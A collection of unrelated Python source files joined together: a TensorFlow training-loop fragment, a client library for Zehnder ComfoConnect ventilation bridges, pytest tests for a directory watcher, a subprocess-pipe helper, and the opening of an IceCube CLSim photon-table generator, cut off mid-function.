                        restart = 0
                        [num_steps, loss, lr, _] = sess.run([reinit_global_step, loss_tensor, learning_rate, train_op],
                                                            feed_dict={ features_tensor: batch_x_mfcc,
                                                                        labels_tensor: batch_y_mfcc,
                                                                        sequence_length: batch_seq_len})
                    else:
                        [num_steps, loss, lr, _] = sess.run([global_step_tensor, loss_tensor, learning_rate, train_op],
                                                            feed_dict={ features_tensor: batch_x_mfcc,
                                                                        labels_tensor: batch_y_mfcc,
                                                                        sequence_length: batch_seq_len})
                    if num_steps % 10 == 0:
                        print('steps: ', num_steps, 'loss: ', loss, 'lr: ', lr)
                    # evaluate
                    if (num_steps != 0) and (num_steps % 1000 == 0) and (hvd.rank() == 0):
                        logging.info("------------------")
                        # logging.info(
                        #     "Iteration: {}, train time: {:.3f} s".format(
                        #         num_steps, time.time() - train_time))
                        logging.info("Test statistics:")
                        # tensorflow/core/framework/allocator.cc:101] Allocation of 561807360 exceeds 10% of system memory.
                        # Run inference in chunks to avoid GPU memory overflow.
                        output = []
                        test_len = len(test_x_mfcc)
                        start_pos = 0
                        max_iter_len = batch_size # 300 overflow GPU
                        while True:
                            print(start_pos)
                            iter_test_len = ((test_len - start_pos) if ((test_len - start_pos) < max_iter_len) else max_iter_len)
                            if (iter_test_len <= 0):
                                break
                            local_output = sess.run(output_tensor,
                                                    feed_dict={
                                                        features_tensor: test_x_mfcc[start_pos:start_pos+iter_test_len],
                                                        labels_tensor: test_y_mfcc[start_pos:start_pos+iter_test_len],
                                                        sequence_length: test_seq_len[start_pos:start_pos+iter_test_len],
                                                    })
                            # print('local_output.shape', local_output.shape)
                            output = ( local_output if (output == []) else np.concatenate((output, local_output)) )
                            start_pos += iter_test_len
                        # output = sess.run(output_tensor, feed_dict={features_tensor: test_x_mfcc}) #output = model.predict(input)
                        print('output', output.shape)
                        print('test_y_mfcc', test_y_mfcc.shape)
                        mAP, _, AP = tf_evaluate(
                            target=test_y_mfcc,
                            output=output,
                            stats_dir=os.path.join(stats_dir, "test"),
                            probs_dir=os.path.join(probs_dir, "test"),
                            iteration=num_steps,
                            labels_map=labels_dict['id'])
                        labels_dict['AP'] = AP
                        for (name, ap) in zip(labels_dict['name'], labels_dict['AP']):
                            print(name, '\t', ap)
                        # infer = np.argsort (-output[0])
                        # print(output[0][infer][:40])
    # if IS_DISTRIBUTE:
    #     task_generate_batch.terminate() # parallel related.
    # train_writer.close() # summary related.
|
comfoconnect.py | import logging
import queue
import struct
import threading
import time
from .bridge import Bridge
from .error import *
from .message import Message
from .zehnder_pb2 import *
# Seconds between keepalive messages sent to the bridge
# (see ComfoConnect._message_thread_loop).
KEEPALIVE = 60
DEFAULT_LOCAL_UUID = bytes.fromhex('00000000000000000000000000001337')
DEFAULT_LOCAL_DEVICENAME = 'pycomfoconnect'
DEFAULT_PIN = 0
_LOGGER = logging.getLogger('comfoconnect')
# Sensor variable size: maps a sensor pdid to the RPDO type code used as
# the default `type` argument of cmd_rpdo_request when registering
# (see ComfoConnect.register_sensor).
RPDO_TYPE_MAP = {
    16: 1,
    33: 1,
    37: 1,
    49: 1,
    53: 1,
    56: 1,
    65: 1,
    66: 1,
    67: 1,
    70: 1,
    71: 1,
    81: 3,
    82: 3,
    85: 3,
    86: 3,
    87: 3,
    117: 1,
    118: 1,
    119: 2,
    120: 2,
    121: 2,
    122: 2,
    128: 2,
    129: 2,
    130: 2,
    144: 2,
    145: 2,
    146: 2,
    176: 1,
    192: 2,
    208: 1,
    209: 6,
    210: 0,
    211: 0,
    212: 6,
    213: 2,
    214: 2,
    215: 2,
    216: 2,
    217: 2,
    218: 2,
    219: 2,
    221: 6,
    224: 1,
    225: 1,
    226: 2,
    227: 1,
    228: 1,
    274: 6,
    275: 6,
    276: 6,
    290: 1,
    291: 1,
    292: 1,
    294: 1,
    321: 2,
    325: 2,
    337: 3,
    338: 3,
    341: 3,
    369: 1,
    370: 1,
    371: 1,
    372: 1,
    384: 6,
    386: 0,
    400: 6,
    401: 1,
    402: 0,
    416: 6,
    417: 6,
    418: 1,
    419: 0,
}
class ComfoConnect(object):
    """Implements the commands to communicate with the ComfoConnect ventilation unit."""
    """Callback function to invoke when sensor updates are received."""
    callback_sensor = None

    def __init__(self, bridge: Bridge, local_uuid=DEFAULT_LOCAL_UUID, local_devicename=DEFAULT_LOCAL_DEVICENAME,
                 pin=DEFAULT_PIN):
        """Store connection parameters and initialise the session state."""
        self._bridge = bridge
        self._local_uuid = local_uuid
        self._local_devicename = local_devicename
        self._pin = pin
        self._reference = 1  # monotonically increasing message reference
        self._queue = queue.Queue()  # replies queued by the message thread
        self._connected = threading.Event()
        self._stopping = False
        self._message_thread = None
        self._connection_thread = None
        self.sensors = {}  # sensor_id -> sensor_type for registered sensors

    # ==================================================================================================================
    # Core functions
    # ==================================================================================================================
    def connect(self, takeover=False):
        """Connect to the bridge and login. Disconnect existing clients if needed by default."""
        try:
            # Start connection
            self._connect(takeover=takeover)
        except PyComfoConnectNotAllowed:
            raise Exception('Could not connect to the bridge since the PIN seems to be invalid.')
        except PyComfoConnectOtherSession:
            raise Exception('Could not connect to the bridge since there is already an open session.')
        except Exception as exc:
            _LOGGER.error(exc)
            raise Exception('Could not connect to the bridge.')
        # Set the stopping flag
        self._stopping = False
        self._connected.clear()
        # Start connection thread
        self._connection_thread = threading.Thread(target=self._connection_thread_loop)
        self._connection_thread.start()
        # Wait (up to 10 s) until the connection thread signals readiness.
        if not self._connected.wait(10):
            raise Exception('Could not connect to bridge since it didn\'t reply on time.')
        return True

    def disconnect(self):
        """Disconnect from the bridge."""
        # Set the stopping flag
        self._stopping = True
        # Wait for the background thread to finish
        self._connection_thread.join()
        self._connection_thread = None

    def is_connected(self):
        """Returns whether there is a connection with the bridge."""
        return self._bridge.is_connected()

    def register_sensor(self, sensor_id: int, sensor_type: int = None):
        """Register a sensor on the bridge and keep it in memory that we are registered to this sensor."""
        # NOTE(review): `not sensor_type` also triggers for an explicit
        # sensor_type of 0 (a valid value in RPDO_TYPE_MAP); compare with
        # unregister_sensor which uses `is None` — confirm intended.
        if not sensor_type:
            sensor_type = RPDO_TYPE_MAP.get(sensor_id)
            if sensor_type is None:
                raise Exception("Registering sensor %d with unknown type" % sensor_id)
        # Register on bridge
        try:
            reply = self.cmd_rpdo_request(sensor_id, sensor_type)
        except PyComfoConnectNotAllowed:
            return None
        # Register in memory
        self.sensors[sensor_id] = sensor_type
        return reply

    def unregister_sensor(self, sensor_id: int, sensor_type: int = None):
        """Unregister a sensor on the bridge and forget that we were registered to it."""
        if sensor_type is None:
            sensor_type = RPDO_TYPE_MAP.get(sensor_id)
            if sensor_type is None:
                raise Exception("Unregistering sensor %d with unknown type" % sensor_id)
        # Unregister in memory
        self.sensors.pop(sensor_id, None)
        # Unregister on bridge (timeout=0 requests removal)
        self.cmd_rpdo_request(sensor_id, sensor_type, timeout=0)

    def _command(self, command, params=None, use_queue=True):
        """Sends a command and wait for a response if the request is known to return a result."""
        # Construct the message
        message = Message.create(
            self._local_uuid,
            self._bridge.uuid,
            command,
            {'reference': self._reference},
            params
        )
        # Increase message reference
        self._reference += 1
        # Send the message
        self._bridge.write_message(message)
        try:
            # Check if this command has a confirm type set
            confirm_type = message.class_to_confirm[command]
            # Read a message
            reply = self._get_reply(confirm_type, use_queue=use_queue)
            return reply
        except KeyError:
            # Command has no confirmation type: nothing to wait for.
            return None

    def _get_reply(self, confirm_type=None, timeout=5, use_queue=True):
        """Pops a message of the queue, optionally looking for a specific type."""
        start = time.time()
        while True:
            message = None
            if use_queue:
                try:
                    # Fetch the message from the queue. The network thread has put it there for us.
                    message = self._queue.get(timeout=timeout)
                    if message:
                        self._queue.task_done()
                except queue.Empty:
                    # We got no message
                    pass
            else:
                # Fetch the message directly from the socket
                message = self._bridge.read_message(timeout=timeout)
            if message:
                # Check status code and raise the matching error.
                if message.cmd.result == GatewayOperation.OK:
                    pass
                elif message.cmd.result == GatewayOperation.BAD_REQUEST:
                    raise PyComfoConnectBadRequest()
                elif message.cmd.result == GatewayOperation.INTERNAL_ERROR:
                    raise PyComfoConnectInternalError()
                elif message.cmd.result == GatewayOperation.NOT_REACHABLE:
                    raise PyComfoConnectNotReachable()
                elif message.cmd.result == GatewayOperation.OTHER_SESSION:
                    raise PyComfoConnectOtherSession(message.msg.devicename)
                elif message.cmd.result == GatewayOperation.NOT_ALLOWED:
                    raise PyComfoConnectNotAllowed()
                elif message.cmd.result == GatewayOperation.NO_RESOURCES:
                    raise PyComfoConnectNoResources()
                elif message.cmd.result == GatewayOperation.NOT_EXIST:
                    raise PyComfoConnectNotExist()
                elif message.cmd.result == GatewayOperation.RMI_ERROR:
                    raise PyComfoConnectRmiError()
                if confirm_type is None:
                    # We just need a message
                    return message
                elif message.msg.__class__ == confirm_type:
                    # We need the message with the correct type
                    return message
                else:
                    # We got a message with an incorrect type. Hopefully, this doesn't happen to often,
                    # since we just put it back on the queue.
                    self._queue.put(message)
            if time.time() - start > timeout:
                raise ValueError('Timeout waiting for response.')

    # ==================================================================================================================
    # Connection thread
    # ==================================================================================================================
    def _connection_thread_loop(self):
        """Makes sure that there is a connection open."""
        self._stopping = False
        while not self._stopping:
            # Start connection
            if not self.is_connected():
                # Wait a bit to avoid hammering the bridge
                time.sleep(5)
                try:
                    # Connect or re-connect
                    self._connect()
                except PyComfoConnectOtherSession:
                    self._bridge.disconnect()
                    _LOGGER.error('Could not connect to the bridge since there is already an open session.')
                    continue
                except Exception as exc:
                    _LOGGER.error(exc)
                    raise Exception('Could not connect to the bridge.')
            # Start background thread
            self._message_thread = threading.Thread(target=self._message_thread_loop)
            self._message_thread.start()
            # Re-register for sensor updates
            for sensor_id in self.sensors:
                self.cmd_rpdo_request(sensor_id, self.sensors[sensor_id])
            # Send the event that we are ready
            self._connected.set()
            # Wait until the message thread stops working
            self._message_thread.join()
        # Close socket connection
        self._bridge.disconnect()

    def _connect(self, takeover=False):
        """Connect to the bridge and login. Disconnect existing clients if needed by default."""
        try:
            # Connect to the bridge
            self._bridge.connect()
            # Login
            self.cmd_start_session(takeover, use_queue=False)
        except PyComfoConnectNotAllowed:
            # No dice, maybe we are not registered yet...
            # Register
            self.cmd_register_app(self._local_uuid, self._local_devicename, self._pin, use_queue=False)
            # Login
            self.cmd_start_session(takeover, use_queue=False)
        return True

    # ==================================================================================================================
    # Message thread
    # ==================================================================================================================
    def _message_thread_loop(self):
        """Listen for incoming messages and queue them or send them to a callback method."""
        # Reinitialise the queues
        self._queue = queue.Queue()
        next_keepalive = 0
        while not self._stopping:
            # Sends a keepalive every KEEPALIVE seconds.
            if time.time() > next_keepalive:
                next_keepalive = time.time() + KEEPALIVE
                self.cmd_keepalive()
            try:
                # Read a message from the bridge.
                message = self._bridge.read_message()
            except BrokenPipeError as exc:
                # Close this thread. The connection_thread will restart us.
                # NOTE(review): typo 'THe' in this log message.
                _LOGGER.warning('THe connection was broken. We will try to reconnect later.')
                return
            if message:
                if message.cmd.type == GatewayOperation.CnRpdoNotificationType:
                    self._handle_rpdo_notification(message)
                elif message.cmd.type == GatewayOperation.GatewayNotificationType:
                    _LOGGER.info('Unhandled GatewayNotificationType')
                    # TODO: We should probably handle these somehow
                    pass
                elif message.cmd.type == GatewayOperation.CnNodeNotificationType:
                    _LOGGER.info('Unhandled CnNodeNotificationType')
                    # TODO: We should probably handle these somehow
                    pass
                elif message.cmd.type == GatewayOperation.CnAlarmNotificationType:
                    _LOGGER.info('Unhandled CnAlarmNotificationType')
                    # TODO: We should probably handle these somehow
                    pass
                elif message.cmd.type == GatewayOperation.CloseSessionRequestType:
                    _LOGGER.info('The Bridge has asked us to close the connection. We will try to reconnect later.')
                    # Close this thread. The connection_thread will restart us.
                    return
                else:
                    # Send other messages to a queue
                    self._queue.put(message)
        return

    def _handle_rpdo_notification(self, message):
        """Update internal sensor state and invoke callback."""
        # Only process CnRpdoNotificationType
        if message.cmd.type != GatewayOperation.CnRpdoNotificationType:
            return False
        # Extract data; length of the hex string selects the unpack format.
        data = message.msg.data.hex()
        if len(data) == 2:
            # 1 byte -> signed char
            val = struct.unpack('b', message.msg.data)[0]
        elif len(data) == 4:
            # 2 bytes -> signed short
            val = struct.unpack('h', message.msg.data)[0]
        elif len(data) == 8:
            # NOTE(review): same as the default branch — raw hex string is kept.
            val = data
        else:
            val = data
        # Update local state
        # self.sensors[message.msg.pdid] = val
        if self.callback_sensor:
            self.callback_sensor(message.msg.pdid, val)
        return True

    # ==================================================================================================================
    # Commands
    # ==================================================================================================================
    def cmd_start_session(self, take_over=False, use_queue: bool = True):
        """Starts the session on the device by logging in and optionally disconnecting an already existing session."""
        reply = self._command(
            StartSessionRequest,
            {
                'takeover': take_over
            },
            use_queue=use_queue
        )
        return reply  # TODO: parse output

    def cmd_close_session(self, use_queue: bool = True):
        """Stops the current session."""
        reply = self._command(
            CloseSessionRequest,
            use_queue=use_queue
        )
        return reply  # TODO: parse output

    def cmd_list_registered_apps(self, use_queue: bool = True):
        """Returns a list of all the registered clients."""
        reply = self._command(
            ListRegisteredAppsRequest,
            use_queue=use_queue
        )
        return [
            {'uuid': app.uuid, 'devicename': app.devicename} for app in reply.msg.apps
        ]

    def cmd_register_app(self, uuid, device_name, pin, use_queue: bool = True):
        """Register a new app by specifying our own uuid, device_name and pin code."""
        reply = self._command(
            RegisterAppRequest,
            {
                'uuid': uuid,
                'devicename': device_name,
                'pin': pin,
            },
            use_queue=use_queue
        )
        return reply  # TODO: parse output

    def cmd_deregister_app(self, uuid, use_queue: bool = True):
        """Remove the specified app from the registration list."""
        if uuid == self._local_uuid:
            raise Exception('You should not deregister yourself.')
        try:
            self._command(
                DeregisterAppRequest,
                {
                    'uuid': uuid
                },
                use_queue=use_queue
            )
            return True
        except PyComfoConnectBadRequest:
            return False

    def cmd_version_request(self, use_queue: bool = True):
        """Returns version information."""
        reply = self._command(
            VersionRequest,
            use_queue=use_queue
        )
        return {
            'gatewayVersion': reply.msg.gatewayVersion,
            'serialNumber': reply.msg.serialNumber,
            'comfoNetVersion': reply.msg.comfoNetVersion,
        }

    def cmd_time_request(self, use_queue: bool = True):
        """Returns the current time on the device."""
        reply = self._command(
            CnTimeRequest,
            use_queue=use_queue
        )
        return reply.msg.currentTime

    def cmd_rmi_request(self, message, node_id: int = 1, use_queue: bool = True):
        """Sends a RMI request."""
        reply = self._command(
            CnRmiRequest,
            {
                'nodeId': node_id or 1,
                'message': message
            },
            use_queue=use_queue
        )
        return True

    def cmd_rpdo_request(self, pdid: int, type: int = 1, zone: int = 1, timeout=None, use_queue: bool = True):
        """Register a RPDO request."""
        reply = self._command(
            CnRpdoRequest,
            {
                'pdid': pdid,
                'type': type,
                'zone': zone or 1,
                'timeout': timeout
            },
            use_queue=use_queue
        )
        return reply

    def cmd_keepalive(self, use_queue: bool = True):
        """Sends a keepalive."""
        self._command(
            KeepAlive,
            use_queue=use_queue
        )
        return True
|
test_watch.py | """Test helpers module."""
import os
import shutil
import multiprocessing
import time
import pytest
import watch
fixtures_dir = os.path.join('tests', 'fixtures')
@pytest.fixture
def setup(request):
    """Create the watch fixture layout and remove all created files on teardown.

    Layout (inside the fixtures dir): watch1/ (contains onetep.dat),
    watch2/ (empty), and watch3 as a plain file.
    """
    cwd = os.getcwd()
    os.chdir(fixtures_dir)
    os.mkdir('watch1')
    os.mkdir('watch2')
    open(os.path.join('watch1', 'onetep.dat'), 'a').close()
    # Fixed: os.path.join with a single component is a no-op.
    open('watch3', 'a').close()

    def fin():
        shutil.rmtree('watch1')
        shutil.rmtree('watch2')
        os.remove('watch3')
        os.chdir(cwd)
    request.addfinalizer(fin)
@pytest.fixture
def setup_process_dirs(request):
    """Create the necessary files for process_dirs function.

    Creates an error dir (with an .error_message file), a completed dir
    (with a copied .out file) and an empty dir; all removed on teardown.
    """
    error_dir = os.path.join(fixtures_dir, 'watch_error')
    # Fixed: this assignment was duplicated in the original.
    completed_dir = os.path.join(fixtures_dir, 'watch_completed')
    empty_dir = os.path.join(fixtures_dir, 'watch_empty')
    os.mkdir(error_dir)
    os.mkdir(completed_dir)
    os.mkdir(empty_dir)
    open(os.path.join(error_dir, 'f.error_message'), 'a').close()
    shutil.copy(os.path.join(fixtures_dir, 'one.out'), completed_dir)

    def fin():
        shutil.rmtree(error_dir)
        shutil.rmtree(completed_dir)
        shutil.rmtree(empty_dir)
    request.addfinalizer(fin)
@pytest.fixture
def setup_run(request):
    """Create the directories and delayed output files the run tests expect."""
    error_dir = os.path.join(fixtures_dir, 'run_error')
    completed_dir = os.path.join(fixtures_dir, 'run_completed')
    empty_dir = os.path.join(fixtures_dir, 'run_empty')
    for directory in (error_dir, completed_dir, empty_dir):
        os.mkdir(directory)
    shutil.copy(os.path.join(fixtures_dir, 'one.out'), empty_dir)

    def delayed_output():
        # Produce the error/completed marker files shortly after the
        # watcher has started polling.
        time.sleep(0.1)
        open(os.path.join(error_dir, 'f.error_message'), 'a').close()
        with open(os.path.join(completed_dir, 'f.out'), 'w') as f:
            f.write('line1\nline2\nline3\nline4\nline5\n'
                    'Job started: foo\nJob completed: bar')

    worker = multiprocessing.Process(target=delayed_output)
    worker.daemon = True
    worker.start()

    def fin():
        for directory in (error_dir, completed_dir, empty_dir):
            shutil.rmtree(directory)
    request.addfinalizer(fin)
@pytest.mark.parametrize('args', [
    [],
    ['*'],
    ['watch*'],
    ['watch1']
])
def test_watchdirs(args, setup):
    """watchdirs should resolve glob args to dirs that contain .dat files."""
    if args:
        expected = ['watch1']
        result = watch.watchdirs(args, 'dat')
    else:
        # With no arguments the current directory itself is scanned.
        os.chdir('watch1')
        expected = ['./']
        result = watch.watchdirs(args, 'dat')
        os.chdir('../')
    assert result == expected
def test_process_dirs(setup_process_dirs):
    """Test process_dirs function within Watch class."""
    config = {'outfile_ext': 'out', 'interval': 1}
    dirs = [os.path.join(fixtures_dir, name)
            for name in ('watch_error', 'watch_completed', 'watch_empty')]
    watcher = watch.Watch(dirs, config)
    result = watcher.process_dirs()
    # One status dict per watched directory, in order:
    # errored, completed, and still-empty.
    assert result == [
        {'have_errfile': True, 'have_outfile': False, 'completed': True},
        {'have_errfile': False, 'have_outfile': True, 'completed': True},
        {'have_errfile': False, 'have_outfile': False, 'completed': False},
    ]
def test_run(setup_run):
    """Watch.run should log a failed line and a completed line, in order."""
    log_file = 'teptools-' + time.strftime('%d%m%Y-%H%M') + '.log'
    config = {
        'outfile_ext': 'out',
        'interval': 0.3,
        'email': ''
    }
    dirs = [os.path.join(fixtures_dir, name)
            for name in ('run_error', 'run_completed', 'run_empty')]
    expected = [
        (' tests/fixtures/run_error failed\n'),
        (' tests/fixtures/run_completed successfully completed\n')
    ]
    watcher = watch.Watch(dirs, config)
    watcher.run()
    with open(log_file, 'r') as f:
        lines = f.readlines()
    os.remove(log_file)
    for i, line in enumerate(lines):
        assert line.endswith(expected[i])
|
systematizing.py | """
Created on Oct 22, 2013
@author: rgeorgi
"""
import subprocess
import sys
import logging
from threading import Thread
from queue import Empty, Queue
from unittest.case import TestCase
import time
def enqueue_output(out, queue):
    """Forward every line of the binary stream *out* onto *queue*, then close it."""
    line = out.readline()
    while line != b'':
        queue.put(line)
        line = out.readline()
    out.close()
def thread_handler(out, func):
    """Invoke *func* on every line of *out*, decoded as UTF-8 and stripped."""
    while True:
        raw = out.readline()
        if raw == b'':
            break
        func(raw.decode('utf-8').strip())
def handle_stderr(p, queue, func):
    """While process *p* is alive, drain *queue* and pass decoded payloads to *func*."""
    while p.poll() is None:
        try:
            payload = queue.get_nowait()
        except Empty:
            # Nothing buffered yet; poll the process again.
            continue
        func(payload.decode('utf-8'))
class ProcessCommunicator(object):
    """
    This is a class to make communicating between a commandline program easier.
    It will make available stdin and stdout pipes, while allowing for the stderr
    to be handled by a custom handler.
    """
    def __init__(self, cmd, stdout_func=None, stderr_func=None, shell=False, blocking=False):
        """
        Execute a command, ``cmd`` and save the stdin/stdout for communication,
        but allow the stderr to be read in a non-blocking manner and printed using
        stderr_func.

        :param cmd: Command to be run
        :type cmd: str or list
        :param stdout_func: Function to handle stdout lines; when None and
            ``blocking`` is False, stdout is drained and discarded.
        :type stdout_func: func
        :param stderr_func: Function to handle the stderr strings.
        :type stderr_func: func
        :param shell: Passed through to subprocess.Popen.
        :param blocking: When True and no stdout_func is given, leave stdout
            unread so callers can consume ``self.stdout`` themselves.
        """
        # 1) Initialize the subprocess ---------------------------------------------
        # NOTE(review): bufsize=1 means line-buffering, which only applies to
        # text-mode pipes; these pipes are binary — confirm intended.
        self.p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=1,
                                  shell=shell)
        # -------------------------------------------
        # If the stderr_func is None, make sure to apply SOMETHING
        # so that the thread won't deadlock
        if stderr_func is None:
            stderr_func = lambda x: x
        # Daemon thread drains stderr so the child never blocks on a full pipe.
        stderr_t = Thread(target=thread_handler, args=(self.p.stderr, stderr_func))
        stderr_t.daemon = True
        stderr_t.start()
        if stdout_func is None and not blocking:
            stdout_func = lambda x: x
        if stdout_func is not None:
            stdout_t = Thread(target=thread_handler, args=(self.p.stdout, stdout_func))
            stdout_t.daemon = True
            stdout_t.start()

    def wait(self):
        # Block until the subprocess exits; returns its return code.
        return self.p.wait()

    def poll(self):
        # Non-blocking check: return code, or None while still running.
        return self.p.poll()

    def kill(self):
        return self.p.kill()

    @property
    def stdout(self):
        return self.p.stdout

    @property
    def stderr(self):
        return self.p.stderr

    @property
    def stdin(self):
        return self.p.stdin
def piperunner(cmd, log_name=None):
    """
    Run ``cmd`` as a blocking subprocess, logging its combined stdout/stderr.

    :param cmd: command line to execute (split on whitespace)
    :type cmd: str
    :param log_name: logger name to send output to; stdout when falsy
    :type log_name: str
    :return: subprocess return code
    """
    if not log_name:
        out_func = sys.stdout.write
    else:
        logger = logging.getLogger(log_name)
        out_func = logger.info
    out_func('-'*35+' COMMAND: ' + '-'*35+'\n')
    out_func(cmd+'\n'+'-'*80+'\n')
    p = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1)
    q = Queue()
    # Reader thread enqueues output lines so this loop never blocks on the pipe.
    t = Thread(target=enqueue_output, args=(p.stdout, q))
    t.daemon = True
    t.start()
    while p.poll() is None:
        try:
            data = q.get_nowait()
        except Empty:
            # Fixed: the original slept on the *success* path, throttling
            # output to one line per second while busy-waiting when the
            # queue was empty. Back off only when there is nothing to read.
            time.sleep(0.1)
        else:
            out_func(data.decode('utf-8').strip())
    # Fixed: drain whatever the reader thread enqueued after the process
    # exited, so trailing output lines are not silently dropped.
    while True:
        try:
            data = q.get_nowait()
        except Empty:
            break
        out_func(data.decode('utf-8').strip())
    return p.returncode
#===============================================================================
# Testcases
#===============================================================================
class ProcessCommunicatorTest(TestCase):
    # Smoke test: spawn `echo` with stdout forwarded to print and wait for exit.
    # NOTE(review): the name lacks the `test_` prefix, so default unittest
    # discovery will NOT run this method — confirm whether that is intended.
    def error_test(self):
        self.pc = ProcessCommunicator(['echo', 'asdf '], stdout_func=print)
        print(self.pc.wait())
|
generate_clsim_table.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=wrong-import-position, invalid-name, no-member, no-name-in-module
# pylint: disable=import-error
"""
Create a Retro table: Propagate light outwards from a DOM and tabulate the
photons. Uses CLSim (tabulator) to do the work of photon propagation.
"""
# TODO: command-line option to simply return the metadata for a config to e.g.
# extract a hash value one would expect from the given params
from __future__ import absolute_import, division, print_function
__all__ = [
'get_average_dom_z_coords',
'generate_clsim_table',
'parse_args',
]
__author__ = 'P. Eller, J.L. Lanfranchi'
__license__ = '''Copyright 2017 Philipp Eller, Justin L. Lanfranchi
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.'''
from argparse import ArgumentParser
from collections import OrderedDict
from os import (
access, environ, getpid, pathsep, remove, X_OK
)
from os.path import (
abspath, dirname, exists, expanduser, expandvars, isfile, join, split
)
import json
from numbers import Integral
import subprocess
import sys
import threading
import time
import numpy as np
from I3Tray import I3Tray
from icecube.clsim import (
AutoSetGeant4Environment,
GetDefaultParameterizationList,
GetFlasherParameterizationList,
#GetIceCubeDOMAcceptance,
I3CLSimFunctionConstant,
I3CLSimFlasherPulse,
I3CLSimFlasherPulseSeries,
I3CLSimLightSourceToStepConverterGeant4,
I3CLSimLightSourceToStepConverterPPC,
I3CLSimSpectrumTable,
)
from icecube.clsim.tabulator import (
LinearAxis,
PowerAxis,
SphericalAxes,
)
from icecube.clsim.traysegments.common import (
configureOpenCLDevices,
parseIceModel,
)
from icecube import dataclasses
from icecube.dataclasses import (
I3Direction,
I3Particle,
I3Position,
)
from icecube.icetray import I3Frame, I3Module, I3Units, logging, traysegment
from icecube.photospline.photonics import FITSTable
from icecube.phys_services import I3GSLRandomService
if __name__ == '__main__' and __package__ is None:
RETRO_DIR = dirname(dirname(dirname(abspath(__file__))))
if RETRO_DIR not in sys.path:
sys.path.append(RETRO_DIR)
from retro.i3info.extract_gcd import extract_gcd
from retro.utils.misc import expand, hash_obj, mkdir
from retro.tables.clsim_tables import (
CLSIM_TABLE_FNAME_PROTO,
CLSIM_TABLE_METANAME_PROTO,
CLSIM_TABLE_TILE_FNAME_PROTO,
CLSIM_TABLE_TILE_METANAME_PROTO,
)
# Geometry of the simulated sensor (treated as a disk of this radius when
# computing the photon-collection area passed to the CLSim tabulator)
DOM_RADIUS = 0.16510*I3Units.m # 13" diameter
DOM_SURFACE_AREA = np.pi * DOM_RADIUS**2
# Canonical ordering of binning dimensions for each supported coordinate
# system; user-specified axes are re-ordered to match this in
# `generate_clsim_table` (axes with 0 bins are simply omitted)
BINNING_ORDER = {
    'spherical': [
        'r',
        'costheta',
        'phi',
        't',
        'costhetadir',
        'deltaphidir',
    ],
    'cartesian': [
        'x',
        'y',
        'z',
        't',
        'costhetadir',
        'phidir',
    ]
}
def get_average_dom_z_coords(geo, n_ic_strings=78):
    """Find average z coordinates for IceCube (non-DeepCore) and DeepCore
    "z-layers" of DOMs.

    A "z-layer" of DOMs is defined by all DOMs on all strings of a given string
    type with shared DOM (OM) indices.

    Parameters
    ----------
    geo : (n_strings, n_doms_per_string, 3) array
        (x, y, z) coordinate for string 1 (string index 0) DOM 1 (dom index 0)
        is found at geo[0, 0]
    n_ic_strings : int, optional
        Number of leading strings that belong to non-DeepCore IceCube; strings
        at and beyond this index are treated as DeepCore. Default is 78, the
        standard IceCube-86 layout.

    Returns
    -------
    ic_avg_z : shape (n_doms_per_string) array
    dc_avg_z : shape (n_doms_per_string) array
    """
    # Coerce so list-of-lists input also works
    geo = np.asarray(geo)
    # Average each DOM index's z coord (geo[..., 2]) over strings within each
    # sub-detector
    ic_avg_z = geo[:n_ic_strings, :, 2].mean(axis=0)
    dc_avg_z = geo[n_ic_strings:, :, 2].mean(axis=0)
    return ic_avg_z, dc_avg_z
def make_retro_pulse(x, y, z, zenith, azimuth):
    """Retro pulses originate from a DOM with an (x, y, z) coordinate and
    (potentially) a zenith and azimuth orientation (though for now the latter
    are ignored).
    """
    flasher = I3CLSimFlasherPulse()
    flasher.type = I3CLSimFlasherPulse.FlasherPulseType.retro
    flasher.pos = I3Position(x, y, z)
    flasher.dir = I3Direction(zenith, azimuth)
    flasher.time = 0.0
    flasher.numberOfPhotonsNoBias = 10000.
    # The remaining attributes don't make a difference for retro pulses but
    # must be populated
    flasher.pulseWidth = 1.0 * I3Units.ns
    for angular_attr in ('angularEmissionSigmaPolar', 'angularEmissionSigmaAzimuthal'):
        setattr(flasher, angular_attr, 360.0 * I3Units.deg)
    return flasher
def unpin_threads(delay=60):
    """
    When AMD OpenCL fissions the CPU device, it pins each sub-device to a
    physical core. Since we always use sub-device 0, this means that multiple
    instances of the tabulator on a single machine will compete for core 0.
    Reset thread affinity after *delay* seconds to prevent this from happening.

    Parameters
    ----------
    delay : int or float, optional
        Seconds to wait before resetting thread affinity (default: 60)
    """
    # pylint: disable=missing-docstring
    def which(program):
        # Locate `program` on PATH (honoring PATHEXT-style extensions);
        # returns the full path of an executable candidate, else None
        def is_exe(fpath):
            return exists(fpath) and access(fpath, X_OK)
        def ext_candidates(fpath):
            yield fpath
            for ext in environ.get('PATHEXT', '').split(pathsep):
                yield fpath + ext
        fpath, _ = split(program)
        if fpath:
            if is_exe(program):
                return program
        else:
            for path in environ['PATH'].split(pathsep):
                exe_file = join(path, program)
                for candidate in ext_candidates(exe_file):
                    if is_exe(candidate):
                        return candidate
    def taskset(pid, tt=None):
        # get/set the taskset affinity for pid
        # uses a binary number string for the core affinity
        cmd = [which('taskset'), '-p']
        if tt:
            cmd.append(hex(int(tt, 2))[2:])
        cmd.append(str(pid))
        p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # BUGFIX: decode so this works on Python 3, where communicate()
        # returns bytes (on Python 2, str.decode() is a no-op to unicode)
        output = p.communicate()[0].decode().split(':')[-1].strip()
        if not tt:
            return bin(int(output, 16))[2:]
    def resetTasksetThreads(main_pid):
        # reset thread taskset affinity after `delay` seconds
        time.sleep(delay)
        # BUGFIX: original called the `reduce` builtin, which doesn't exist on
        # Python 3 (functools.reduce was never imported), and leaked the file
        # handle; count "processor" lines with sum() inside a context manager
        with open('/proc/cpuinfo') as cpuinfo:
            num_cpus = sum(1 for line in cpuinfo if 'processor' in line)
        tt = '1'*num_cpus
        #tt = taskset(main_pid)
        p = subprocess.Popen(
